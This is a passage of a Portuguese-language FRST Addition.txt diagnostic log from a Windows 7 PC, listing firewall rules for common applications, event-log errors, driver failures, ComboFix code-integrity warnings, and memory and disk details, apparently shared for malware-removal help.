FirewallRules: [{D07E50B8-5DBE-463E-89E9-EB5BA5ECC254}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{2F9F4A8A-6C58-4788-B122-55CDCB4DF77E}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Broforce The Expendables Missions\Expendabros.exe
FirewallRules: [{C220ED82-A771-4697-BDC9-B2C0489F5C85}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Broforce The Expendables Missions\Expendabros.exe
FirewallRules: [{3DA8166A-4C1F-4F51-9CED-EABE15EC1FED}] => (Allow) C:\Users\Volkhadan\AppData\Local\Facebook\Video\Skype\FacebookVideoCalling.exe
FirewallRules: [{30013C0C-A5A5-4B1B-AD6E-93D436B26AA2}] => (Allow) C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\Dropbox.exe
FirewallRules: [{C0993DA4-2350-4ED9-8CF1-E86139044676}] => (Allow) C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\Dropbox.exe
FirewallRules: [TCP Query User{D17C0BAE-D9BF-4D5C-8709-D14594C9C276}C:\users\volkhadan\appdata\roaming\dropbox\bin\dropbox.exe] => (Allow) C:\users\volkhadan\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [UDP Query User{260C7E9B-E349-42F3-B08F-72C8746B3750}C:\users\volkhadan\appdata\roaming\dropbox\bin\dropbox.exe] => (Allow) C:\users\volkhadan\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [{4B7CE363-3237-41F1-9BA3-3DD5B132EC04}] => (Allow) C:\Users\Volkhadan\AppData\Roaming\Spotify\spotify.exe
FirewallRules: [{389BA128-508B-4447-A35A-5608E7DCA8AC}] => (Allow) C:\Users\Volkhadan\AppData\Roaming\Spotify\spotify.exe
FirewallRules: [{5BC6D2E6-9290-4053-A11C-9623899EF734}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{1FEFF9B0-A09A-4A4B-A4F3-FBF82F880665}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{D08D0765-3379-437D-BC30-29B61E0CDFF1}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{AAF61E2D-19BB-4101-B4D2-6626C7684A18}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{92C984F3-27BF-4159-8966-8ED2392A4182}] => (Allow) c:\program files (x86)\real\realplayer\RPDS\Bin\rpdsvc.exe
FirewallRules: [TCP Query User{E3933CD7-F88C-44BE-A438-9A170393AFD8}C:\users\volkhadan\appdata\roaming\spotify\spotify.exe] => (Block) C:\users\volkhadan\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{23D26AE4-DEE6-4291-BE75-E1B608ABDCD0}C:\users\volkhadan\appdata\roaming\spotify\spotify.exe] => (Block) C:\users\volkhadan\appdata\roaming\spotify\spotify.exe
FirewallRules: [{EECAFA99-A5E7-4124-8F61-5E44FCB156C0}] => (Allow) C:\Program Files\Diebold\Warsaw\core.exe
FirewallRules: [{8FEF84CE-26EE-419B-AC85-5744C9104720}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{933CF983-10E7-48C3-A74B-6B2C9E6D6567}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{51F4F2C0-6519-4BBF-81BB-9AABD3BD4B34}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{51F9AE77-799D-4846-A535-98E9ED15B74B}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{D0E509DD-F9B7-4285-B690-DB0EC7784817}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Pontos de Restauração =========================


==================== Dispositivos Apresentando Falhas No Gerenciador =============

Name: Teredo Tunneling Pseudo-Interface
Description: Adaptador de Túnel Teredo da Microsoft
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.


==================== Erros no Log de eventos: =========================

Erros em Aplicativos:
==================
Error: (02/06/2016 11:21:40 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (02/06/2016 12:54:55 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (02/05/2016 09:00:47 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (02/05/2016 08:22:45 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (02/05/2016 08:01:35 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (02/05/2016 06:41:04 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (02/05/2016 06:38:07 PM) (Source: Chrome) (EventID: 1) (User: AUTORIDADE NT)
Description: Chrome has encountered a fatal error.
ver=48.0.2564.103;lang=;guid=3DC2E39EB11B43E2AE2F63CBAD67BA2B;is_machine=1;oop=1;upload=1;minidump=C:\Program Files (x86)\Google\CrashReports\426dddd6-9a8e-4f9e-81ed-9fddca2b7c4b.dmp

Error: (02/05/2016 06:37:58 PM) (Source: Chrome) (EventID: 1) (User: AUTORIDADE NT)
Description: Chrome has encountered a fatal error.
ver=48.0.2564.103;lang=;guid=3DC2E39EB11B43E2AE2F63CBAD67BA2B;is_machine=1;oop=1;upload=1;minidump=C:\Program Files (x86)\Google\CrashReports\810f55d6-3bb7-4cf6-b33f-7582106bd19e.dmp

Error: (02/05/2016 06:37:05 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome de aplicativo com falha: chrome.exe, versão: 48.0.2564.103, carimbo de hora: 0x56b12600
Nome do módulo de falhas: ntdll.dll, versão: 6.1.7601.19110, carimbo de hora: 0x5684255b
Código de exceção: 0xc0000374
Deslocamento com falha: 0x000ced0b
Identificação do processo com falha: 0x588
Hora de início do aplicativo com falha: 0xchrome.exe0
Caminho do aplicativo com falha: chrome.exe1
FCaminho do módulo de falhas: chrome.exe2
Identificação do Relatório: chrome.exe3

Error: (02/05/2016 06:34:56 PM) (Source: Chrome) (EventID: 1) (User: AUTORIDADE NT)
Description: Chrome has encountered a fatal error.
ver=48.0.2564.103;lang=;guid=3DC2E39EB11B43E2AE2F63CBAD67BA2B;is_machine=1;oop=1;upload=1;minidump=C:\Program Files (x86)\Google\CrashReports\2677c972-d009-4fd7-80ba-7b970bb66461.dmp


Erros de Sistema:
=============
Error: (02/06/2016 11:23:54 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Não foi possível iniciar o serviço Gbpddreg svc devido ao seguinte erro:
%%2

Error: (02/06/2016 11:21:18 AM) (Source: DCOM) (EventID: 10016) (User: AUTORIDADE NT)
Description: Específico do aplicativoLocalIniciar{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}{344ED43D-D086-4961-86A6-1106F4ACAD9B}AUTORIDADE NTSISTEMAS-1-5-18LocalHost (Usando LRPC)

Error: (02/06/2016 11:20:30 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Não foi possível iniciar o serviço Gbpddreg svc devido ao seguinte erro:
%%2

Error: (02/06/2016 11:20:24 AM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: Falha ao carregar o(s) seguinte(s) driver(s) de início do sistema ou de inicialização:
gbpddreg
MPCKpt

Error: (02/06/2016 12:56:28 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Não foi possível iniciar o serviço Gbpddreg svc devido ao seguinte erro:
%%2

Error: (02/06/2016 12:54:56 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Não foi possível iniciar o serviço Gbpddreg svc devido ao seguinte erro:
%%2

Error: (02/06/2016 12:54:32 AM) (Source: DCOM) (EventID: 10016) (User: AUTORIDADE NT)
Description: Específico do aplicativoLocalIniciar{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}{344ED43D-D086-4961-86A6-1106F4ACAD9B}AUTORIDADE NTSISTEMAS-1-5-18LocalHost (Usando LRPC)

Error: (02/06/2016 12:53:51 AM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: Falha ao carregar o(s) seguinte(s) driver(s) de início do sistema ou de inicialização:
gbpddreg
MPCKpt

Error: (02/05/2016 10:21:53 PM) (Source: volsnap) (EventID: 36) (User: )
Description: As cópias de sombra do volume C: foram anuladas porque o armazenamento de cópia de sombra não pôde crescer devido a um limite imposto pelo usuário.

Error: (02/05/2016 09:54:25 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {995C996E-D918-4A8C-A302-45719A6F4EA7}


CodeIntegrity:
===================================
Date: 2016-02-05 19:55:42.233
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2016-02-05 19:55:42.156
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2016-02-05 19:55:42.078
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2016-02-05 19:55:41.998
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2016-01-30 16:59:45.041
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2016-01-30 16:59:44.961
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2016-01-30 16:59:44.881
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2016-01-30 16:59:44.806
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2015-08-16 11:01:21.273
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2015-08-16 11:01:21.223
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.


==================== Informações da Memória ===========================

Processador: Pentium(R) Dual-Core CPU T4300 @ 2.10GHz
Percentagem de memória em uso: 66%
RAM física total: 3932.88 MB
RAM física disponível: 1329.73 MB
Virtual Total: 7863.96 MB
Virtual disponível: 5033.18 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:149.34 GB) (Free:7.03 GB) NTFS
Drive d: (Data) (Fixed) (Total:148.65 GB) (Free:9.95 GB) NTFS

==================== MBR & Tabela de Partições ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 298.1 GB) (Disk ID: 65806F0B)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=149.3 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=148.7 GB) - (Type=07 NTFS)

==================== Fim de Addition.txt ============================

Publicité


Signaler le contenu de ce document

Publicité